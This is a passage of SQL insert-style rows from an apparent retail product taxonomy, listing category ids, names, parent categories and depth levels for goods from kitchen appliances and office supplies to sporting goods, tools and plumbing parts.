(716,'Canopies & Gazebos',2613,'Outdoor Structures',4),
(717,'Hammocks',2918,'Outdoor Living',3),
(718,'Porch Swings',2918,'Outdoor Living',3),
(719,'Outdoor Umbrellas & Sunshades',2918,'Outdoor Living',3),
(720,'Sheds, Garages & Carports',2613,'Outdoor Structures',4),
(721,'Pots & Planters',2962,'Gardening',3),
(726,'Mace & Pepper Spray',780,'Weapons',2),
(727,'Stun Guns & Tasers',780,'Weapons',2),
(728,'Pest Control',630,'Household Supplies',2),
(729,'Pool & Spa',536,'Home & Garden',1),
(730,'Kitchen Appliances',638,'Kitchen & Dining',2),
(732,'Breadmakers',730,'Kitchen Appliances',3),
(733,'Can Openers',668,'Kitchen Tools & Utensils',3),
(734,'Coffee Grinders',3988,'Coffee Maker & Espresso Machine Accessories',4),
(736,'Coffee Makers & Espresso Machines',730,'Kitchen Appliances',3),
(737,'Slow Cookers',4532,'Food Cookers & Steamers',4),
(738,'Deep Fryers',730,'Kitchen Appliances',3),
(739,'Egg Cookers',4532,'Food Cookers & Steamers',4),
(741,'Electric Knives',668,'Kitchen Tools & Utensils',3),
(743,'Food Dehydrators',730,'Kitchen Appliances',3),
(744,'Food Grinders & Mills',730,'Kitchen Appliances',3),
(747,'Hot Plates',730,'Kitchen Appliances',3),
(748,'Ice Cream Makers',730,'Kitchen Appliances',3),
(749,'Ice Crushers & Shavers',730,'Kitchen Appliances',3),
(750,'Juicers',730,'Kitchen Appliances',3),
(751,'Electric Kettles',730,'Kitchen Appliances',3),
(752,'Knife Sharpeners',730,'Kitchen Appliances',3),
(753,'Microwave Ovens',730,'Kitchen Appliances',3),
(755,'Pasta Makers',730,'Kitchen Appliances',3),
(756,'Popcorn Makers',730,'Kitchen Appliances',3),
(757,'Rice Cookers',4532,'Food Cookers & Steamers',4),
(759,'Sandwich Makers',5289,'Toasters & Grills',4),
(760,'Food Steamers',4532,'Food Cookers & Steamers',4),
(761,'Countertop & Toaster Ovens',5289,'Toasters & Grills',4),
(762,'Toasters',5289,'Toasters & Grills',4),
(763,'Vacuum Sealers',730,'Kitchen Appliances',3),
(764,'Waffle Irons',5289,'Toasters & Grills',4),
(765,'Water Filters',730,'Kitchen Appliances',3),
(766,'Yogurt Makers',730,'Kitchen Appliances',3),
(772,'Mature',0,'',0),
(773,'Erotic',772,'Mature',1),
(774,'Erotic Clothing',773,'Erotic',2),
(775,'Condoms',491,'Health Care',2),
(776,'Erotic DVDs & Videos',773,'Erotic',2),
(777,'Personal Lubricants',2915,'Personal Care',2),
(778,'Sex Toys',773,'Erotic',2),
(779,'Erotic Books',773,'Erotic',2),
(780,'Weapons',772,'Mature',1),
(781,'Ammunition',2214,'Gun Care & Accessories',3),
(782,'Guns',780,'Weapons',2),
(783,'Media',0,'',0),
(784,'Books',783,'Media',1),
(839,'DVDs & Videos',783,'Media',1),
(855,'Music & Sound Recordings',783,'Media',1),
(886,'Magazines & Newspapers',783,'Media',1),
(887,'Sheet Music',783,'Media',1),
(888,'Vehicles & Parts',0,'',0),
(891,'Motor Vehicle Amplifiers',8526,'Motor Vehicle Electronics',3),
(894,'Motor Vehicle Equalizers & Crossovers',8526,'Motor Vehicle Electronics',3),
(895,'Motor Vehicle Speakers',8526,'Motor Vehicle Electronics',3),
(899,'Motor Vehicle Parts',5613,'Vehicle Parts & Accessories',2),
(908,'Motor Vehicle Exhaust',899,'Motor Vehicle Parts',3),
(911,'Motor Vehicle Tires',3020,'Motor Vehicle Wheel Systems',4),
(912,'Radar Detectors',222,'Electronics',1),
(913,'Vehicle Maintenance, Care & Decor',5613,'Vehicle Parts & Accessories',2),
(916,'Cars, Trucks & Vans',1267,'Motor Vehicles',3),
(919,'Motorcycles & Scooters',1267,'Motor Vehicles',3),
(920,'Recreational Vehicles',1267,'Motor Vehicles',3),
(922,'Office Supplies',0,'',0),
(923,'Filing & Organization',922,'Office Supplies',1),
(925,'File Boxes',923,'Filing & Organization',2),
(926,'CD/DVD Cases & Organizers',923,'Filing & Organization',2),
(927,'Calendars, Organizers & Planners',923,'Filing & Organization',2),
(928,'Cash Boxes',923,'Filing & Organization',2),
(930,'File Folders',923,'Filing & Organization',2),
(932,'General Office Supplies',922,'Office Supplies',1),
(934,'Office Tape',932,'General Office Supplies',2),
(935,'Clipboards',2986,'Office Instruments',2),
(936,'Paper Clips & Clamps',932,'General Office Supplies',2),
(938,'Erasers',932,'General Office Supplies',2),
(939,'Desk Organizers',923,'Filing & Organization',2),
(941,'Magnifiers',2986,'Office Instruments',2),
(943,'Pencil Sharpeners',2986,'Office Instruments',2),
(944,'Rubber Bands',932,'General Office Supplies',2),
(947,'Staplers',2986,'Office Instruments',2),
(948,'Staples',932,'General Office Supplies',2),
(949,'Tacks & Pushpins',932,'General Office Supplies',2),
(950,'Office Equipment',922,'Office Supplies',1),
(952,'Label Makers',950,'Office Equipment',2),
(953,'Office Shredders',950,'Office Equipment',2),
(954,'Transcribers & Dictation Systems',950,'Office Equipment',2),
(955,'Typewriters',950,'Office Equipment',2),
(956,'Paper Products',932,'General Office Supplies',2),
(957,'Business Cards',956,'Paper Products',3),
(958,'Envelopes',956,'Paper Products',3),
(959,'Index Cards',956,'Paper Products',3),
(960,'Labels & Tags',932,'General Office Supplies',2),
(961,'Notebooks & Notepads',956,'Paper Products',3),
(962,'Printer & Copier Paper',956,'Paper Products',3),
(963,'Transparencies',964,'Presentation Supplies',2),
(964,'Presentation Supplies',922,'Office Supplies',1),
(965,'Chalkboards',964,'Presentation Supplies',2),
(966,'Display Boards',964,'Presentation Supplies',2),
(967,'Easel Pads',964,'Presentation Supplies',2),
(968,'Easels',964,'Presentation Supplies',2),
(969,'Laser Pointers',964,'Presentation Supplies',2),
(970,'Lecterns',964,'Presentation Supplies',2),
(971,'Dry',964,'Presentation Supplies',2),
(973,'Moving & Shipping Boxes',2636,'Shipping Supplies',2),
(974,'Packing Materials',2636,'Shipping Supplies',2),
(975,'Packing Tape',2636,'Shipping Supplies',2),
(976,'Signage',111,'Business & Industrial',1),
(977,'Writing & Drawing Instruments',2986,'Office Instruments',2),
(978,'Chalk',977,'Writing & Drawing Instruments',3),
(979,'Crayons',977,'Writing & Drawing Instruments',3),
(980,'Markers & Highlighters',977,'Writing & Drawing Instruments',3),
(981,'Writing Pencils',6068,'Pencils',5),
(982,'Pens',6065,'Pens & Pencils',4),
(984,'Flowers',985,'Plants',2),
(985,'Plants',536,'Home & Garden',1),
(988,'Sporting Goods',0,'',0),
(989,'Dancing',499713,'Athletics',2),
(990,'Exercise & Fitness',988,'Sporting Goods',1),
(992,'Elliptical Trainers',4589,'Cardio Machines',4),
(993,'Exercise Balls',990,'Exercise & Fitness',2),
(994,'Exercise Bikes',4589,'Cardio Machines',4),
(995,'Rowing Machines',4589,'Cardio Machines',4),
(996,'Stair Climbers & Steppers',4589,'Cardio Machines',4),
(997,'Treadmills',4589,'Cardio Machines',4),
(999,'Yoga & Pilates',990,'Exercise & Fitness',2),
(1000,'Gymnastics',499713,'Athletics',2),
(1001,'Indoor Games',988,'Sporting Goods',1),
(1002,'Air Hockey',1001,'Indoor Games',2),
(1003,'Billiards',1001,'Indoor Games',2),
(1004,'Bowling',1001,'Indoor Games',2),
(1005,'Throwing Darts',1001,'Indoor Games',2),
(1006,'Fencing',499713,'Athletics',2),
(1007,'Foosball',1001,'Indoor Games',2),
(1008,'Ping Pong',1001,'Indoor Games',2),
(1009,'Table Shuffleboard',1001,'Indoor Games',2),
(1011,'Outdoor Recreation',988,'Sporting Goods',1),
(1013,'Camping & Hiking',1011,'Outdoor Recreation',2),
(1014,'Camp Furniture',1013,'Camping & Hiking',3),
(1015,'Portable Cooking Stoves',730,'Kitchen Appliances',3),
(1016,'Camping Cookware & Dinnerware',1013,'Camping & Hiking',3),
(1017,'Coolers',2920,'Food & Beverage Carriers',3),
(1019,'Camping Lights & Lanterns',1013,'Camping & Hiking',3),
(1020,'Sleeping Bags',1013,'Camping & Hiking',3),
(1021,'Sleeping Pads',1013,'Camping & Hiking',3),
(1022,'Tents',1013,'Camping & Hiking',3),
(1023,'Portable Water Filters & Purifiers',1013,'Camping & Hiking',3),
(1025,'Cycling',1011,'Outdoor Recreation',2),
(1026,'Bicycles',1025,'Cycling',3),
(1027,'Bicycle Locks',3214,'Bicycle Accessories',4),
(1028,'Bicycle Front & Rear Racks',3214,'Bicycle Accessories',4),
(1029,'Bicycle Helmets',3982,'Cycling Apparel & Accessories',4),
(1030,'Unicycles',1025,'Cycling',3),
(1031,'Equestrian',1011,'Outdoor Recreation',2),
(1033,'Archery',499824,'Hunting & Shooting',3),
(1034,'Hunting Blinds & Screens',3136,'Hunting',4),
(1037,'Fishing Lines & Leaders',3334,'Fishing',3),
(1041,'Tackle Bags & Boxes',3334,'Fishing',3),
(1043,'Golf',1011,'Outdoor Recreation',2),
(1044,'Golf Bags',1043,'Golf',3),
(1045,'Golf Balls',1043,'Golf',3),
(1046,'Golf Clubs',1043,'Golf',3),
(1047,'Team Handball',499713,'Athletics',2),
(1049,'Paintball',499834,'Paintball & Airsoft',4),
(1051,'Auto Racing Fan Accessories',3515,'Sports Fan Accessories',5),
(1057,'Ice Skates',499915,'Figure Skating & Hockey',3),
(1058,'Inline Skates',499761,'Inline & Roller Skating',3),
(1059,'Skateboards',3276,'Skateboarding',3),
(1060,'Track & Field',499713,'Athletics',2),
(1062,'Badminton',499846,'Outdoor Games',3),
(1065,'Tennis',499713,'Athletics',2),
(1068,'Wrestling',499713,'Athletics',2),
(1070,'Baseball & Softball',499713,'Athletics',2),
(1074,'Baseball & Softball Fan Accessories',3515,'Sports Fan Accessories',5),
(1076,'Baseball & Softball Gloves & Mitts',1070,'Baseball & Softball',3),
(1077,'Pitching Machines',1070,'Baseball & Softball',3),
(1078,'Baseball & Softball Protective Gear',1070,'Baseball & Softball',3),
(1081,'Basketball',499713,'Athletics',2),
(1082,'Basketball Hoops',1081,'Basketball',3),
(1083,'Basketballs',1081,'Basketball',3),
(1084,'Basketball Fan Accessories',3515,'Sports Fan Accessories',5),
(1087,'Cricket',499713,'Athletics',2),
(1089,'Field Hockey Balls',499741,'Field Hockey & Lacrosse',3),
(1092,'Field Hockey Sticks',499741,'Field Hockey & Lacrosse',3),
(1093,'Football',499713,'Athletics',2),
(1094,'Footballs',1093,'Football',3),
(1095,'Football Fan Accessories',3515,'Sports Fan Accessories',5),
(1097,'Football Protective Gear',1093,'Football',3),
(1098,'Football Helmets',1097,'Football Protective Gear',4),
(1105,'Hockey Protective Gear',499915,'Figure Skating & Hockey',3),
(1110,'Rugby',499713,'Athletics',2),
(1111,'Soccer',499713,'Athletics',2),
(1112,'Soccer Balls',1111,'Soccer',3),
(1113,'Soccer Goals',1111,'Soccer',3),
(1114,'Soccer Shin Guards',499784,'Soccer Protective Gear',4),
(1115,'Volleyball',499713,'Athletics',2),
(1116,'Volleyballs',1115,'Volleyball',3),
(1117,'Volleyball Nets',1115,'Volleyball',3),
(1120,'Boating & Rafting',499811,'Boating & Water Sports',3),
(1122,'Watercraft Care',3391,'Watercraft Parts & Accessories',3),
(1124,'Canoes',1120,'Boating & Rafting',4),
(1125,'Watercraft Engines & Motors',3391,'Watercraft Parts & Accessories',3),
(1127,'Kayaks',1120,'Boating & Rafting',4),
(1128,'Life Jackets',499813,'Boating & Water Sport Apparel',4),
(1129,'Paddles & Oars',1120,'Boating & Rafting',4),
(1130,'Personal Watercraft',3540,'Watercraft',3),
(1132,'Sailboat Parts',3391,'Watercraft Parts & Accessories',3),
(1133,'Boat Trailers',4027,'Motor Vehicle Trailers',4),
(1135,'Diving & Snorkeling',499811,'Boating & Water Sports',3),
(1136,'Buoyancy Compensators',1135,'Diving & Snorkeling',4),
(1137,'Dive Computers',1135,'Diving & Snorkeling',4),
(1138,'Drysuits',499813,'Boating & Water Sport Apparel',4),
(1139,'Diving & Snorkeling Fins',1135,'Diving & Snorkeling',4),
(1140,'Diving & Snorkeling Masks',1135,'Diving & Snorkeling',4),
(1141,'Diving Regulators',1135,'Diving & Snorkeling',4),
(1142,'Snorkels',1135,'Diving & Snorkeling',4),
(1143,'Surfing',499811,'Boating & Water Sports',3),
(1144,'Swimming',499811,'Boating & Water Sports',3),
(1145,'Water Polo',499713,'Athletics',2),
(1146,'Water Skiing',3195,'Towed Water Sports',4),
(1147,'Wetsuits',499813,'Boating & Water Sport Apparel',4),
(1148,'Windsurfing',499811,'Boating & Water Sports',3),
(1157,'Ski Poles',499845,'Skiing & Snowboarding',4),
(1158,'Downhill Skis',6064,'Skis',5),
(1161,'Ski & Snowboard Helmets',499845,'Skiing & Snowboarding',4),
(1162,'Snowboard Bindings',499845,'Skiing & Snowboarding',4),
(1163,'Snowboard Boots',499845,'Skiing & Snowboarding',4),
(1164,'Snowboards',499845,'Skiing & Snowboarding',4),
(1166,'Snowshoeing',499844,'Winter Sports & Activities',3),
(1167,'Tools',632,'Hardware',1),
(1169,'Anvils',1167,'Tools',2),
(1171,'Axes',1167,'Tools',2),
(1174,'Carving Chisels & Gouges',1167,'Tools',2),
(1179,'Pry Bars',1167,'Tools',2),
(1180,'Cutters',1167,'Tools',2),
(1181,'Bolt Cutters',1180,'Cutters',3),
(1182,'Glass Cutters',1180,'Cutters',3),
(1184,'Taps & Dies',1167,'Tools',2),
(1185,'Grips',1167,'Tools',2),
(1186,'Hammers',1167,'Tools',2),
(1187,'Planes',1167,'Tools',2),
(1188,'Sanders',1167,'Tools',2),
(1191,'Levels',1305,'Measuring Tools & Sensors',3),
(1193,'Masonry Tools',1167,'Tools',2),
(1194,'Nail Pullers',1167,'Tools',2),
(1195,'Socket Drivers',1167,'Tools',2),
(1196,'Pickup Tools',1167,'Tools',2),
(1198,'Protractors',1305,'Measuring Tools & Sensors',3),
(1201,'Saw Horses',1167,'Tools',2),
(1202,'Putty Knives & Scrapers',1167,'Tools',2),
(1203,'Screwdrivers',1167,'Tools',2),
(1205,'Squares',1305,'Measuring Tools & Sensors',3),
(1206,'Nailers & Staplers',1167,'Tools',2),
(1207,'Stud Sensors',1305,'Measuring Tools & Sensors',3),
(1215,'Caulking Tools',1167,'Tools',2),
(1216,'Drill Presses',1217,'Drills',3),
(1217,'Drills',1167,'Tools',2),
(1218,'Generators',127,'Power & Electrical Supplies',2),
(1219,'Grinders',1167,'Tools',2),
(1220,'Heat Guns',1167,'Tools',2),
(1221,'Impact Wrenches & Drivers',1167,'Tools',2),
(1223,'Weed Trimmers',3798,'Outdoor Power Equipment',3),
(1225,'Polishers & Buffers',1167,'Tools',2),
(1226,'Pressure Washers',3798,'Outdoor Power Equipment',3),
(1235,'Saws',1167,'Tools',2),
(1236,'Soldering Irons',1167,'Tools',2),
(1238,'Welding Guns & Plasma Cutters',1167,'Tools',2),
(1239,'Toys & Games',0,'',0),
(1241,'Baby Walkers & Entertainers',2847,'Baby Toys & Activity Equipment',2),
(1242,'Baby Mobiles',2847,'Baby Toys & Activity Equipment',2),
(1243,'Play Mats & Gyms',2847,'Baby Toys & Activity Equipment',2),
(1244,'Rattles',2847,'Baby Toys & Activity Equipment',2),
(1246,'Board Games',3793,'Games',2),
(1247,'Card Games',3793,'Games',2),
(1249,'Outdoor Play Equipment',1239,'Toys & Games',1),
(1251,'Playhouses',1249,'Outdoor Play Equipment',2),
(1253,'Toys',1239,'Toys & Games',1),
(1254,'Building Toys',1253,'Toys',2),
(1255,'Dolls, Playsets & Toy Figures',1253,'Toys',2),
(1257,'Dolls',1255,'Dolls, Playsets & Toy Figures',3),
(1258,'Puppets & Marionettes',1255,'Dolls, Playsets & Toy Figures',3),
(1259,'Stuffed Animals',1255,'Dolls, Playsets & Toy Figures',3),
(1261,'Flying Toys',1253,'Toys',2),
(1262,'Educational Toys',1253,'Toys',2),
(1264,'Musical Toys',1253,'Toys',2),
(1266,'Sports Toys',1253,'Toys',2),
(1267,'Motor Vehicles',5614,'Vehicles',2),
(1268,'Beach & Sand Toys',1253,'Toys',2),
(1270,'Video Game Console Accessories',222,'Electronics',1),
(1279,'Video Game Software',2092,'Software',1),
(1294,'Video Game Consoles',222,'Electronics',1),
(1300,'Paint Brushes',2077,'Paint Tools',3),
(1301,'Floppy Drives',2414,'Storage Devices',4),
(1302,'Sprinkler Controls',3780,'Sprinkler Accessories',4),
(1305,'Measuring Tools & Sensors',1167,'Tools',2),
(1306,'Water & Flood Detectors',1679,'Flood, Fire & Gas Safety',2),
(1312,'Seal Stamps',216,'Collectibles',3),
(1318,'Coils',2878,'Hardware Accessories',2),
(1319,'Plumbing Traps',504637,'Drain Components',4),
(1334,'Microwave Oven Accessories',2901,'Kitchen Appliance Accessories',3),
(1337,'Modulators',1801,'Components',2),
(1340,'Sword Stands & Displays',220,'Collectible Weapons',4),
(1348,'UPS',275,'Power',3),
(1350,'Bridges & Routers',342,'Networking',2),
(1352,'Fence Pickets',128,'Fencing & Barriers',2),
(1354,'Water Chillers',2343,'Water Dispensers',4),
(1356,'Door Knobs & Handles',6343,'Door Hardware',3),
(1360,'Toothpaste',526,'Oral Care',3),
(1361,'Paint',503740,'Painting Consumables',3),
(1367,'Augers',1217,'Drills',3),
(1368,'Video Editing Hardware & Production Equipment',386,'Video',2),
(1371,'Invitations',96,'Party Supplies',3),
(1374,'Weather Forecasters & Stations',1305,'Measuring Tools & Sensors',3),
(1375,'UPS Accessories',275,'Power',3),
(1380,'Vision Care',2915,'Personal Care',2),
(1387,'Mustard',427,'Condiments & Sauces',3),
(1388,'Drip Coffee Makers',736,'Coffee Makers & Espresso Machines',4),
(1390,'Water Distillers',2273,'Water Dispensing & Filtration',3),
(1391,'Deburrers',1167,'Tools',2),
(1395,'Coffee Tables',6369,'Accent Tables',3),
(1407,'Drain Rods',504637,'Drain Components',4),
(1413,'Straight Edges',1305,'Measuring Tools & Sensors',3),
(1420,'Audio Accessories',223,'Audio',2),
(1425,'Ballcocks & Flappers',2691,'Toilet & Bidet Accessories',4),
(1434,'Fire Extinguishers',1679,'Flood, Fire & Gas Safety',2),
(1436,'Emergency Lighting',594,'Lighting',2),
(1439,'Tool Keys',1167,'Tools',2),
(1442,'Massage Chairs',5663,'Massage & Relaxation',3),
(1444,'Flasks',2920,'Food & Beverage Carriers',3),
(1445,'Crackers',423,'Snack Foods',3),
(1450,'Masonry Jointers',1193,'Masonry Tools',3),
(1454,'Handheld Metal Shears & Nibblers',1180,'Cutters',3),
(1458,'Fixture Plates',504635,'Plumbing Fixture Hardware & Parts',3),
(1459,'Measuring Wheels',1305,'Measuring Tools & Sensors',3),
(1463,'Table & Bar Stools',443,'Chairs',2),
(1465,'Mortisers',1217,'Drills',3),
(1469,'Wire & Cable Hand Tools',1167,'Tools',2),
(1470,'Manufacturing',111,'Business & Industrial',1),
(1475,'Hotel & Hospitality',111,'Business & Industrial',1),
(1479,'Chimney Cleaners',2277,'Chemicals',3),
(1480,'Network Cables',259,'Cables',3),
(1483,'Ponytail Holders',171,'Hair Accessories',3),
(1484,'Envelope Seals',96,'Party Supplies',3),
(1487,'TV Tuner Cards & Adapters',287,'I/O Cards & Adapters',4),
(1489,'Faucet Accessories',504635,'Plumbing Fixture Hardware & Parts',3),
(1491,'Cinches',5593,'Horse Tack',4),
(1492,'Chains',502977,'Chain, Wire & Rope',3),
(1496,'Foil',3110,'Food Wraps',4),
(1505,'Home Game Console Accessories',1270,'Video Game Console Accessories',2),
(1508,'Drywall Anchors',500054,'Hardware Fasteners',3),
(1513,'Cover Paper',956,'Paper Products',3),
(1514,'Drain Frames',504637,'Drain Components',4),
(1516,'Skirt Suits',1594,'Suits',3),
(1519,'HVAC Controls',499873,'Heating, Ventilation & Air Conditioning',2),
(1529,'Herbs & Spices',4608,'Seasonings & Spices',3),
(1530,'Fireplace Tools',2862,'Fireplace & Wood Stove Accessories',2),
(1533,'Cruising Rods',1305,'Measuring Tools & Sensors',3),
(1534,'Popcorn',423,'Snack Foods',3),
(1539,'Rebar Locators',1305,'Measuring Tools & Sensors',3),
(1540,'Drill & Screwdriver Bits',3944,'Drill & Screwdriver Accessories',3),
(1541,'Snow Blowers',3798,'Outdoor Power Equipment',3),
(1544,'Splitters',1801,'Components',2),
(1546,'Flood & Spot Lights',594,'Lighting',2),
(1548,'Light Meters',42,'Lighting & Studio',3),
(1549,'End Tables',6369,'Accent Tables',3),
(1550,'Fish Finders',340,'Marine Electronics',2),
(1552,'Marine Radar',340,'Marine Electronics',2),
(1555,'Construction Lines',1193,'Masonry Tools',3),
(1556,'Law Enforcement',111,'Business & Industrial',1),
(1557,'French Presses',736,'Coffee Makers & Espresso Machines',4),
(1562,'KVM Switches',1928,'Input Devices',4),
(1563,'Plungers',1167,'Tools',2),
(1564,'Laptop Batteries',276,'Batteries',4),
(1568,'Mayonnaise',427,'Condiments & Sauces',3),
(1573,'Bagels',1876,'Bakery',3),
(1578,'Shapewear',213,'Underwear & Socks',3),
(1580,'Tuxedos',1594,'Suits',3),
(1581,'Skirts',1604,'Clothing',2),
(1584,'Threading Machines',1167,'Tools',2),
(1594,'Suits',1604,'Clothing',2),
(1599,'Nap Mats',569,'Bedding',3),
(1602,'Sofa Tables',6369,'Accent Tables',3),
(1603,'Light Bulb Changers',1167,'Tools',2),
(1604,'Clothing',166,'Apparel & Accessories',1),
(1611,'Studio Backgrounds',42,'Lighting & Studio',3),
(1622,'Photographic Chemicals',41,'Darkroom',3),
(1623,'Hard Drive Accessories',2414,'Storage Devices',4),
(1624,'Science & Laboratory',111,'Business & Industrial',1),
(1625,'Laminators',950,'Office Equipment',2),
(1626,'Climate Control Appliances',604,'Household Appliances',2),
(1627,'Mounting Boards',966,'Display Boards',3),
(1632,'Wrenches',1167,'Tools',2),
(1634,'Video Multiplexers',386,'Video',2),
(1636,'Bathtubs',1673,'Plumbing Fixtures',3),
(1639,'Fire Extinguisher & Equipment Storage',1679,'Flood, Fire & Gas Safety',2),
(1640,'Flow Meters & Controllers',1305,'Measuring Tools & Sensors',3),
(1644,'Sharpeners',1167,'Tools',2),
(1645,'Surgical Gowns',2496,'Medical',2),
(1647,'Electric & Stovetop Espresso Pots',736,'Coffee Makers & Espresso Machines',4),
(1648,'Stains',503740,'Painting Consumables',3),
(1653,'Palette Knives',505391,'Color Mixing Tools',5),
(1659,'Shoe Polishes & Waxes',628,'Shoe Care & Tools',3),
(1662,'Headbands',171,'Hair Accessories',3),
(1663,'Lathes',1167,'Tools',2),
(1665,'Cache Memory',288,'Memory',3),
(1667,'Pipe & Bar Benders',1167,'Tools',2),
(1668,'Brick Tools',1193,'Masonry Tools',3),
(1671,'Gin',417,'Liquor & Spirits',4),
(1673,'Plumbing Fixtures',133,'Plumbing',2),
(1675,'Garters',2563,'Lingerie Accessories',4),
(1679,'Flood, Fire & Gas Safety',536,'Home & Garden',1),
(1680,'Pregnancy Tests',505293,'Medical Tests',3),
(1683,'Printer Memory',502990,'Printer, Copier & Fax Machine Accessories',3),
(1684,'Trees',985,'Plants',2),
(1687,'Sinks',1673,'Plumbing Fixtures',3),
(1694,'Plumbing Flanges',1810,'Plumbing Fittings & Supports',3),
(1695,'Weapon Scopes & Sights',4040,'Scopes',3),
(1698,'Measuring Scales',1305,'Measuring Tools & Sensors',3),
(1699,'Paint Sponges',2077,'Paint Tools',3),
(1700,'Ceiling Fans',608,'Fans',4),
(1702,'Salsa',5740,'Dips & Spreads',3),
(1708,'Postage Meters',950,'Office Equipment',2),
(1709,'Water Heater Vents',2751,'Water Heater Accessories',3),
(1718,'Antennas',2082,'Electronics Accessories',2),
(1719,'Palettes',505391,'Color Mixing Tools',5),
(1722,'Camera Batteries',276,'Batteries',4),
(1723,'Well Supplies',133,'Plumbing',2),
(1732,'Gauges',1305,'Measuring Tools & Sensors',3),
(1733,'RAM',288,'Memory',3),
(1735,'Acid Neutralizers',2277,'Chemicals',3),
(1738,'Trampolines',1249,'Outdoor Play Equipment',2),
(1739,'Nuts & Bolts',500054,'Hardware Fasteners',3),
(1744,'Water Heater Elements',2751,'Water Heater Accessories',3),
(1745,'Mobile Phone Batteries',276,'Batteries',4),
(1746,'Urinals',2062,'Toilets & Bidets',4),
(1749,'Drain Cleaners',2277,'Chemicals',3),
(1753,'Lubricants',503739,'Building Consumables',2),
(1754,'Reins',5593,'Horse Tack',4),
(1755,'Dried Fruits',430,'Fruits & Vegetables',3),
(1763,'System & Power Cables',259,'Cables',3),
(1767,'Video Memory',288,'Memory',3),
(1771,'Hinges',2878,'Hardware Accessories',2),
(1772,'Lingerie',213,'Underwear & Socks',3),
(1774,'Paint Rollers',2077,'Paint Tools',3),
(1779,'Shower Doors & Enclosures',2206,'Shower Parts',4),
(1783,'Gun Holsters',2214,'Gun Care & Accessories',3),
(1785,'Probes & Finders',1305,'Measuring Tools & Sensors',3),
(1786,'Balaclavas',167,'Clothing Accessories',2),
(1787,'Tap Reseaters',1167,'Tools',2),
(1788,'Gates',128,'Fencing & Barriers',2),
(1794,'Sands & Soils',2962,'Gardening',3),
(1795,'Heavy Machinery',111,'Business & Industrial',1),
(1799,'Masonry Edgers & Groovers',1193,'Masonry Tools',3),
(1801,'Components',222,'Electronics',1),
(1802,'Automotive Alarm Systems',2768,'Vehicle Alarms & Locks',4),
(1803,'Paperweights',2014,'Paper Handling',2),
(1806,'Gun Grips',2214,'Gun Care & Accessories',3),
(1807,'Long Johns',213,'Underwear & Socks',3),
(1809,'Work Platforms',130,'Ladders & Scaffolding',3),
(1810,'Plumbing Fittings & Supports',133,'Plumbing',2),
(1813,'Finance & Insurance',111,'Business & Industrial',1),
(1816,'Filters & Screens',2878,'Hardware Accessories',2),
(1817,'Beer Dispensers & Taps',649,'Barware',3),
(1819,'Reamers',1167,'Tools',2),
(1821,'Drinking Fountains',2343,'Water Dispensers',4),
(1822,'Gun Rails',2214,'Gun Care & Accessories',3),
(1824,'Rebar Cutters',1180,'Cutters',3),
(1827,'Forestry & Logging',111,'Business & Industrial',1),
(1831,'Vests',203,'Outerwear',3),
(1832,'Marking Tools',1167,'Tools',2),
(1835,'Water Heater Pans',2751,'Water Heater Accessories',3),
(1836,'Paper Joggers',2014,'Paper Handling',2),
(1837,'Paper & Plastic Shopping Bags',138,'Retail',2),
(1841,'Routing Tools',1167,'Tools',2),
(1850,'Dividers',1305,'Measuring Tools & Sensors',3),
(1855,'Cottage Cheese',428,'Dairy Products',3),
(1856,'Shoelaces',1933,'Shoe Accessories',2),
(1862,'Pipe Brushes',1167,'Tools',2),
(1863,'Pogo Sticks',1249,'Outdoor Play Equipment',2),
(1865,'Toilet & Bidet Seats',2691,'Toilet & Bidet Accessories',4),
(1866,'Scaffolding',130,'Ladders & Scaffolding',3),
(1867,'Audio & Video Cables',259,'Cables',3),
(1868,'Coffee',413,'Beverages',2),
(1869,'Power Outlets & Sockets',127,'Power & Electrical Supplies',2),
(1870,'Key Card Entry Systems',1974,'Locks & Keys',2),
(1871,'Fire Alarms',1679,'Flood, Fire & Gas Safety',2),
(1874,'Shoe Brushes',628,'Shoe Care & Tools',3),
(1876,'Bakery',422,'Food Items',2),
(1880,'Cordless Phone Batteries',276,'Batteries',4),
(1887,'Response Cards',96,'Party Supplies',3),
(1893,'Wristbands',167,'Clothing Accessories',2),
(1895,'Muffins',1876,'Bakery',3),
(1897,'Thermostats',1519,'HVAC Controls',3),
(1898,'Hospital Gowns',2496,'Medical',2),
(1901,'Hair Styling Products',486,'Hair Care',3),
(1906,'Cuffs',1556,'Law Enforcement',2),
(1910,'Storage Tanks',632,'Hardware',1),
(1919,'Fence Posts & Rails',128,'Fencing & Barriers',2),
(1921,'Toilets',2062,'Toilets & Bidets',4),
(1922,'Headdresses',2020,'Headwear',3),
(1923,'Shapers',1167,'Tools',2),
(1924,'Satellite Phones',270,'Telephony',3),
(1926,'Whiskey',417,'Liquor & Spirits',4),
(1927,'Sew',505379,'Embellishments & Trims',5),
(1928,'Input Devices',285,'Computer Components',3),
(1932,'Drain Openers',504637,'Drain Components',4),
(1933,'Shoe Accessories',166,'Apparel & Accessories',1),
(1934,'Fire Sprinklers',1679,'Flood, Fire & Gas Safety',2),
(1935,'Light Switches',6459,'Electrical Switches',3),
(1948,'Hair Forks & Sticks',171,'Hair Accessories',3),
(1949,'Religious Veils',97,'Religious Items',2),
(1952,'Water Softeners',2273,'Water Dispensing & Filtration',3),
(1954,'Yogurt',428,'Dairy Products',3),
(1958,'Pliers',1167,'Tools',2),
(1962,'Shower Rods',574,'Bathroom Accessories',2),
(1963,'Sink Accessories',504635,'Plumbing Fixture Hardware & Parts',3),
(1967,'Lawn & Garden Sprayers',3173,'Gardening Tools',4),
(1969,'Salad Dressing',427,'Condiments & Sauces',3),
(1974,'Locks & Keys',632,'Hardware',1),
(1977,'Electronics Component Connectors',1801,'Components',2),
(1979,'Drop Cloths',2878,'Hardware Accessories',2),
(1985,'Blankets',569,'Bedding',3),
(1991,'Gas Detectors',1305,'Measuring Tools & Sensors',3),
(1993,'Mouse Pads',279,'Computer Accessories',3),
(1994,'Pneumatic Drills',1217,'Drills',3),
(1995,'Solder & Flux',503739,'Building Consumables',2),
(1996,'AV Carts',6373,'Office Carts',2),
(2002,'Rocking Chairs',443,'Chairs',2),
(2006,'Electrical Mount Boxes & Brackets',127,'Power & Electrical Supplies',2),
(2007,'Studio Stands & Mounts',42,'Lighting & Studio',3),
(2008,'Roof Flashings',123,'Roofing',3),
(2014,'Paper Handling',922,'Office Supplies',1),
(2015,'Compressors',1167,'Tools',2),
(2018,'Ketchup',427,'Condiments & Sauces',3),
(2020,'Headwear',167,'Clothing Accessories',2),
(2021,'Rulers',1305,'Measuring Tools & Sensors',3),
(2027,'Video Accessories',386,'Video',2),
(2028,'Phone & Data Jacks',127,'Power & Electrical Supplies',2),
(2030,'Hatches',115,'Building Materials',2),
